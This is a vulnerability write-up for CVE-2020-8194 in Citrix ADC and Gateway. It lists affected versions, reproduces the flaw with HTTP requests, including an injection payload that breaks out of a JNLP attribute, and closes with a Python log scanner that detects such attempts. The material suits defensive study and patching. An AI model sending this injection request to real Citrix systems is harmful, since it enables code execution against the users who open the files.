# (CVE-2020-8194) Citrix Unauthenticated Access Leading to Arbitrary Code Execution

1. Vulnerability Overview
------------

Citrix ADC and Citrix NetScaler Gateway contain a code injection vulnerability. An unauthenticated remote attacker can use it to create a malicious file; if a victim on the management network executes that file, the attacker can run arbitrary code in that user's context.

2. Affected Versions
------------

- Citrix ADC and Citrix Gateway: < 13.0-58.30
- Citrix ADC and NetScaler Gateway: < 12.1-57.18
- Citrix ADC and NetScaler Gateway: < 12.0-63.21
- Citrix ADC and NetScaler Gateway: < 11.1-64.14
- NetScaler ADC and NetScaler Gateway: < 10.5-70.18
- Citrix SD-WAN WANOP: < 11.1.1a
- Citrix SD-WAN WANOP: < 11.0.3d
- Citrix SD-WAN WANOP: < 10.2.7
- Citrix Gateway Plug-in for Linux: < 1.0.0.137

3. Reproduction
------------

> The Java Web Start file is generated from the URL below; this URL requires no authentication:

```http
GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1
```

Citrix then returns a generated file to the user, and that file is permitted to connect to the Citrix appliance:

```http
HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

GUI citrix.local
Citrix Systems, Inc.
Configuration Utility – Web Start Client
-D
0
-WS
0
-codebase
2://citrix.local
-ns4
1
-ns104
```

(The JNLP markup of the response body was lost when this page was extracted; only its text nodes survive. Note that the value `2` sent in the `protocol` parameter appears verbatim in the `-codebase` argument, `2://citrix.local`.)

As shown above, user-supplied input is reflected directly into the output, so we can try to get malicious code executed:

```http
GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org
```

Response:

```http
HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo">

GUI citrix.local
Citrix Systems, Inc.
```

(Markup was again stripped in extraction, and the page's typographic quotes have been restored to plain `"`. What survives shows the effect: the `">` injected through `protocol` terminates the quoted attribute, so the remainder of the query string lands outside that attribute in the generated JNLP rather than inside a quoted value.)
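Detection logic for the behaviour shown above, as an added example that is not part of the original write-up or of any Citrix code: it scans Apache-style access-log lines for requests to `/menu/guiw` and flags any of the four reflected parameters (`nsbrand`, `protocol`, `id`, `nsvpx`) whose URL-decoded value contains a character that can leave a quoted XML attribute or open a tag. The log format, client IPs, timestamps and the percent-encoded variant are constructed for the example; the `wiki.0-sec.org">` value is the one from the request on this page. It goes slightly beyond the page in decoding a second time, so double-encoded payloads are caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The four query parameters the write-up shows being reflected into the generated JNLP.
REFLECTED_PARAMS = ("nsbrand", "protocol", "id", "nsvpx")
# Characters that let a value leave a double-quoted XML attribute or open a new element.
BREAKOUT_CHARS = frozenset('"\'<>')

# Apache "combined" access-log shape (an assumption for this example): client, identd,
# user, [timestamp] "METHOD target protocol" status size. Apache escapes a literal '"'
# inside the request line as '\"', so the target is matched as a run of non-space chars.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[0-9.]+)" (?P<status>\d{3})'
)


def suspicious_guiw_params(target):
    """Return [(param, decoded value), ...] for /menu/guiw parameters that contain
    breakout characters; [] for a clean /menu/guiw request; None for any other path."""
    parts = urlsplit(target)
    if parts.path != "/menu/guiw":
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in REFLECTED_PARAMS:
        for value in params.get(name, []):
            # parse_qs has already percent-decoded once; decoding a second time catches
            # double-encoded payloads such as %2522 for '"'.
            value = unquote(value)
            if BREAKOUT_CHARS & set(value):
                findings.append((name, value))
    return findings


def scan_access_log(lines):
    """Return [(client, status, findings), ...] for every /menu/guiw request seen.

    Clean hits are reported too (with findings == []): the write-up's point is that
    this endpoint answers without authentication, so any hit from outside the
    management network deserves a look, while hits with breakout characters are the
    injection attempts themselves."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = m.group("target").replace('\\"', '"')  # undo Apache's quote escaping
        findings = suspicious_guiw_params(target)
        if findings is None:
            continue
        hits.append((m.group("client"), int(m.group("status")), findings))
    return hits


# Constructed sample log lines. Client addresses are documentation ranges; the request
# targets are modelled on the two requests in this write-up plus a double-encoded variant.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jan/2020:20:32:44 +0000] "GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1" 200 2320',
    '198.51.100.7 - - [26/Jan/2020:12:52:01 +0000] "GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org\\">&id=HENKC&nsvpx=phpinfo HTTP/1.1" 200 2398',
    '198.51.100.7 - - [26/Jan/2020:12:53:10 +0000] "GET /menu/guiw?nsbrand=1&protocol=%2522%253E%253Cx&id=3&nsvpx=4 HTTP/1.1" 200 2410',
    '203.0.113.9 - - [26/Jan/2020:12:54:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 1102',
]

if __name__ == "__main__":
    for client, status, findings in scan_access_log(SAMPLE_LOG):
        verdict = "INJECTION ATTEMPT" if findings else "unauthenticated JNLP fetch"
        print(f"{client} {status} {verdict} {findings}")
```

Run directly, it prints one line per `/menu/guiw` hit: the first sample is a plain unauthenticated fetch of the JNLP, the second and third carry attribute-breakout characters. The scan only tells you whether anyone has already tried; the fix is upgrading to the builds listed in section 2.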
